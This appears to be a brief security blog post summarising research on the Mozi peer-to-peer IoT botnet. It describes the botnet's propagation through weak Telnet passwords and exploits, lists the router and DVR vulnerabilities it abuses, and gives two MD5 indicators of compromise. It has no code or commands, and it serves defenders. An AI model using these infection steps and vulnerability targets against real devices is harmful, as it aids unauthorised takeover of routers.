Mozi Botnet [Based on DHT protocol]

Routers are actively being probed for weak Telnet passwords and taken over by a new peer-to-peer (P2P) botnet called Mozi, this is related to the Gafgyt malware as it reuses some of its code.

The Mozi Botnet uses its own extended DHT protocol to build a P2P network.

According to NetLab who discovered this botnet, Mozi infects new devices through weak telnet passwords and exploits. The infection process is as follows:

  • The current Bot node randomly uses a local port to start the http service to provide sample downloads or receives the sample download address in the Config file issued by the Botnet Master.Provides a sample download address for future infected targets.
  • The current Bot node logs in to the target device with a weak password, writes the downloader file in echo mode and runs it, and downloads the sample file from the sample download address provided by the current Bot node. Or use a vulnerability to exploit the target, and then obtain a sample file from the sample download address provided by the current Bot node.
  • Run the Mozi Bot sample on the infected target device, join the Mozi P2P network to become the new Mozi Bot node and continue to infect other new devices.

The vulnerabilities used by Mozi Botnet are shown in the following table:

VulnerabilityAffected Aevice
Eir D1000 Wireless Router RCIEir D1000 Router
Vacron NVR RCEVacron NVR devices
CVE-2014-8361Devices using the Realtek SDK
Netgear cig-bin Command InjectionNetgear R7000 and R6400
Netgear setup.cgi unauthenticated RCEDGN1000 Netgear routers
JAWS Webserver unauthenticated shell command executionMVPower DVR
CVE-2017-17215Huawei Router HG532
HNAP SoapAction-Header Command ExecutionD-Link Devices
CVE-2018-10561, CVE-2018-10562GPON Routers
UPnP SOAP TelnetD Command ExecutionD-Link Devices
CCTV/DVR Remote Code ExecutionCCTV DVR

IoC list

MD5:

eda730498b3d0a97066807a2d98909f3
849b165f28ae8b1cebe0c7430f44aff3

Further details can be found at – https://blog.netlab.360.com/mozi-another-botnet-using-dht/

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: